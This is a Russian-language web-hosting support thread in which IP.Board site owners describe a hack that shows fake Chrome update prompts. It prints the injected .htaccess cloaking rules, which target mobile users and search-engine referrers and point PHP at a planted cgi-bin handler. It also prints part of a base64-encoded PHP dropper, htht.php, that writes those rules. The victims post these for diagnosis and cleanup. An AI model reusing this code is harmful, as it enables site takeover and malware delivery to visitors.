Jump to content

Взлом сайта - обновите ваш браузер Google Chrome

Quicksdk
Quicksdk
in Техническая поддержка IP.Board

Featured Replies

Posted
comment_15983

Уже как пару дней как взломан сайт. Не знаю что и делать...

Вообщем сам взлом заключался в том, что бы при переходе из поиска показывать сообщение об обновление браузера. такое сообщение показывалось только на Chrome.

 

Насколько я понял, была добавлена папка cgi-bin (именно была добавлена, потому что изначально я ее удалял) и там уже .htaccess и какой-то скрипт.

 

Я попытался сделать откат к старому бэкапу где все было нормально. Но сейчас он выдает 404

 

Not Found
The requested URL /cgi-bin/php5.2.cgi/index.php was not found on this server.
  • Цитата
    • Link to comment
    https://ipbmafia.ru/topic/2396-vzlom-sajta-obnovite-vash-brauzer-google-chrome/
    Share on other sites
    comment_15984

    Тебя стилером походу ломанули

  • Цитата
    • Author
    comment_15985

    Это как?

     

    .htaccess положенный в корень сайта



    RewriteEngine on
    RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]
    RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
    RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
    RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
    RewriteCond %{HTTP_USER_AGENT} !unix [NC]
    RewriteCond %{HTTP_USER_AGENT} !macos [NC]
    RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
    RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
    RewriteCond %{HTTP_USER_AGENT} !google [NC]
    RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
    RewriteCond %{HTTP_USER_AGENT} !bot [NC]
    RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
    RewriteCond %{HTTP_USER_AGENT} !msn [NC]
    RewriteCond %{HTTP_USER_AGENT} !america [NC]
    RewriteCond %{HTTP_USER_AGENT} !avant [NC]
    RewriteCond %{HTTP_USER_AGENT} !download [NC]
    RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
    RewriteCond %{HTTP_USER_AGENT} !maui [NC]
    RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
    RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]



    RewriteCond %{REMOTE_ADDR} ^193.201.2(?:29|3[01]) [OR]
    RewriteCond %{REMOTE_ADDR} ^213.243.64 [OR]
    RewriteCond %{REMOTE_ADDR} ^46.229.1(?:28|3[234]|4[01]) [OR]
    RewriteCond %{REMOTE_ADDR} ^83.149.[12389] [OR]
    RewriteCond %{REMOTE_ADDR} ^83.149.(?:2[14]|3[4-8]|4[3-79]|5[26-9]|6[0-3]) [OR]
    RewriteCond %{REMOTE_ADDR} ^83.149.48.[0-9] [OR]
    RewriteCond %{REMOTE_ADDR} ^83.149.48.[1-9][0-9] [OR]
    RewriteCond %{REMOTE_ADDR} ^83.149.48.1(?:[01][0-9]|2[0-7]) [OR]
    RewriteCond %{REMOTE_ADDR} ^83.229.224 [OR]
    RewriteCond %{REMOTE_ADDR} ^85.26.1(?:28|36|55|6[45]|8[346]|9[2-5]) [OR]
    RewriteCond %{REMOTE_ADDR} ^85.26.2(?:0[48]|1[26]|2[047-9]|3[0-5]|4[18]) [OR]

    RewriteCond %{REMOTE_ADDR} ^80.83.2(?:28|3[0-3]) [OR]
    RewriteCond %{REMOTE_ADDR} ^80.83.2(?:24|3[7-9]).[0-9] [OR]
    RewriteCond %{REMOTE_ADDR} ^80.83.2(?:24|3[7-9]).[1-9][0-9] [OR]
    RewriteCond %{REMOTE_ADDR} ^80.83.2(?:24|3[7-9]).1(?:[01][0-9]|2[0-7]) [OR]
    RewriteCond %{REMOTE_ADDR} ^84.17.25[45] [OR]
    RewriteCond %{REMOTE_ADDR} ^95.153.1(?:[6-8][0-9]|9[01]) [OR]
    RewriteCond %{REMOTE_ADDR} ^95.153.25[2-5] [OR]
    RewriteCond %{REMOTE_ADDR} ^194.54.1(?:4[89]|5[01]) [OR]
    RewriteCond %{REMOTE_ADDR} ^213.87 [OR]
    RewriteCond %{REMOTE_ADDR} ^217.8.2(?:2[6-9]|3[0-49]) [OR]
    RewriteCond %{REMOTE_ADDR} ^217.66.1(?:4[6-9]|5[0-26]) [OR]
    RewriteCond %{REMOTE_ADDR} ^217.74.24[47].1(?:2[89]|[3-9][0-9]) [OR]
    RewriteCond %{REMOTE_ADDR} ^217.74.24[47].2(?:[0-4][0-9]|5[0-5]) [OR]
    RewriteCond %{REMOTE_ADDR} ^217.74.2(?:4[589]|5[01])



    RewriteCond %{HTTP_REFERER} (ya|yandex|google|mail|rambler|vk) [NC]
    RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo! slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]



    Options -MultiViews
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]

    AddDefaultCharset utf-8
    Action php5.2-script /cgi-bin/php5.2.cgi
    AddType php5.2-script .php

     

     

    Определелил еще кое-что. без .htaccess сайт вроде работает нормально ( там есть проблемка с mod_rewrite, но если брать ВООБЩЕ, тогда нормально). Но мне нужен этот .htaccess  и когда я кидаю старый, он у меня перезаписывается...

  • Цитата
    comment_15987

    Все в .htaccess замените на

    <IfModule mod_rewrite.c>
Options -MultiViews
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule .(jpeg|jpg|gif|png)$ /public/404.php [NC,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>


    Все лишние файлы поудаляйте.

    В сканере IP.Board (центр безопасности) посмотрите есть ли какие-нибудь подозрительные файлы (имена странные), если да — удаляйте.

  • Цитата
    • Author
    comment_15988

    жесть... у меня в каждой папке .htaccess + в папке cache появились mobileNotification.cgi и w00t.php какие то еще файлы phpшные...

  • Цитата
    comment_15989

     

    Уже как пару дней как взломан сайт. Не знаю что и делать...

    Вообщем сам взлом заключался в том, что бы при переходе из поиска показывать сообщение об обновление браузера. такое сообщение показывалось только на Chrome.

     

    Насколько я понял, была добавлена папка cgi-bin (именно была добавлена, потому что изначально я ее удалял) и там уже .htaccess и какой-то скрипт.

     

    Я попытался сделать откат к старому бэкапу где все было нормально. Но сейчас он выдает 404

     

    Not Found
The requested URL /cgi-bin/php5.2.cgi/index.php was not found on this server.

     

    У меня тоже самое!!! на двух сайтах (на трёх) только когда с телефона входишь.

  • Цитата
    • Author
    comment_15990

    Ну а решение ты нашел?

  • Цитата
    comment_15992

    Ну а решение ты нашел?

    К сожелению нет :(

  • Цитата
    comment_16004

    Многие знают что такое стиллер и принцип его работыИз за стиллера у многих появилась фобия "Запомнить пароль"
    Многие боятся хранить свои пароли в браузере, так как стиллер их крадёт
    Но есть такая идея, перед которой даже стиллер бессилен
    Приступем к самой идеи


    как мы знаем пароли в браузерах хранятся в спец. файлов


    Google Chrome :


    XP -
    C:Documents and SettingsUsernameLocal SettingsApplication DataGoogleChromeUser DataDefault
    в файле “Web Data”




    Vista -
    C:UsersUsernameAppdataLocalGoogleChromeUser DataDefault
    в файле “Web Data”






    Firefox :
    Пассы в Firefox хранятся в файле signons.txt или signons2.txt или signons3.txt.


    Который лежит тут : [Windows Profil]Application DataMozillaFirefoxProfiles






    Opera :
    [Windows Profil]Application DataOperaOpera
    в файле wand.dat


    Но как же их защитить от стиллера ?
    вы удивитесь как просто это сделать
    вам надо только поменять имя или путь где лежат эти файлы
    Для того чтоб поменять имя или путь этих фалов надо открыть настройки браузера
    как это делается читаем ниже


    Для Firefox
    Открываем браузер
    В поле для урл пишем about:config и открываем
    Если это ваш первый вход то браузер предупредить вас чтоб вы были осторожны
    Вам откроется окно где куча настроек
    На верху в поле Поиск пишем signon и даем поиск
    Поиск найдет 3 файлов “signon.txt” “signon2.txt” “signon3.txt”
    Два раза кликаем по этим файлом и меняем имя
    Но не забудьте , если вы signon.txt поменяли на pass.txt то signon2.txt должны поменять на pass2.txt
    Все после этого перезапустите браузер


    ВАЖНО! Перед тем как провернуть такую фишку не забудьте удалить все пароли из файлов “signon.txt” “signon2.txt” “signon3.txt”




    Для Opera


    Как выше уже отметил пассы от Оперы хранятся в файле wand.dat
    Но мы несможем поменять имя файла, вместо этого мы поменяем место хранение файла


    Открываем браузер
    В поле для урл пишем opera:config и открываем
    тут тоже в поле поиск пишем wand.dat
    в оуне появляется наш файл и путь где он лежит
    нажимаем на обзор и открывается окно где лежит файл
    в этом же окне копируем wand.dat а потом переходим назад директорией выше
    там создаем новую папку
    открываем эту папку и сохраняем файл wand.dat (все эти операции мы делаем в окне которая открылась)
    И все выбираем этот файл и нажимаем Ок
    и все файл с пассамы теперь будет лежать там куда мы его скопировали
    Старый файл уже можно удалять






    Вот и все. Уже стиллер несможет украсть ваши пассы. Так как мы поменяли место хранение файла






    Для Chrome
    В этом браузере мы несможем поменять что то
    Но это незначит что мы несможем зашитить свои пассы
    Для этого есть спец. программа Chromeplus




    Но конечно для всего есть альтернатива
    Для тех кто нехочет копаться в настройках есть программа Kasperky Password Manager
    Устанавливаем и защищаемся

  • Цитата
    comment_16007

    Никакой это не стиллер.

    Fensmas, это тот сайт, который мы в прошлый раз от взлома лечили или другой? Патч безопасности стоит?

    В рунете уже несколько случаев таких зафиксировано.

  • Цитата
    • Author
    comment_16016

    Тот же сайт. Патч не стоит. буду обновляться сейчас.

  • Цитата
    comment_16017

    Тот же сайт. Патч не стоит. буду обновляться сейчас.

    Найдёшь решение напиши мне у меня 3 сайта заражены....

  • Цитата
    • Author
    comment_16018

    Я сделал так: удалил все лишние файлы с cache, удалил все .htaccess во всех папках, и обновил до 3.4. Вроде все.

  • Цитата
    comment_16019

    Я сделал так: удалил все лишние файлы с cache, удалил все .htaccess во всех папках, и обновил до 3.4. Вроде все.

    Надеюсь у тебя всё получилось, помоги мне разобрать файлы cache

    Содержимое cache :

    ac023aa0.png

     

    Cодержимое странных файлов :

    htht.php

     

    <?set_time_limit(0); 
error_reporting(0);


$codes='CgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKUmV3cml0ZUVuZ2luZSBvbgpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gYWNzIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGFsYXYgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gYWxjYSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBhbW9pIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGF1ZGkgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gYXN0ZSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBhdmFuIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGJlbnEgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gYmlyZCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBibGFjIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGJsYXogW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gYnJldyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBjZWxsIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGNsZGMgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gY21kLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBkYW5nIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGRvY28gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gZXJpYyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBoaXB0IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGlubm8gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gaXBhcSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBqYXZhIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGppZ3MgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0ga2RkaSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBrZWppIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGxlbm8gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbGctYyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBsZy1kIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGxnLWcgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbGdlLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBtYXVpIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1heG8gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbWlkcCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBtaXRzIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1tZWYgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbW9iaSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBtb3QtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1vdG8gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbXdicCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBuZWMtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG5ld3QgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbm9raSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBvcHd2IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHBhbG0gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcGFuYSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBwYW50IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHBkeGcgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcGhpbCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBwbGF5IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHBsdWMgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcG9ydCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBwcm94IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHF0ZWsgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcXdhcCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzYWdlIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNhbXMgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc2FueSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzY2gtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNlYy0gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc2VuZCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzZXJpIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNnaC0gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc2hhciBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzaWUtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNpZW0gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc21hbCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzbWFyIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHNvbnkgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gc3BoLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBzeW1iIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHQtbW8gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gdGVsaSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB0aW0tIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHRvc2ggW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gdHNtLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB1cGcxIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHVwc2kgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gdmstdiBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB2b2RhIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHczY3MgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gd2FwLSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB3YXBhIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHdhcGkgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gd2FwcCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB3YXByIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHdlYmMgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gd2ludyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB3aW53IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHhkYSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB4ZGEtIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHVwLmJyb3dzZXIgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gdXAubGluayBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB3aW5kb3dzLmNlIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGllbW9iaWxlIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1pbmkgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbW1wIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IHN5bWJpYW4gW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gbWlkcCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSB3YXAgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcGhvbmUgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gcG9ja2V0IFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IG1vYmlsZSBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBhbmRyb2lkIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IEFuZHJvaWQgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFU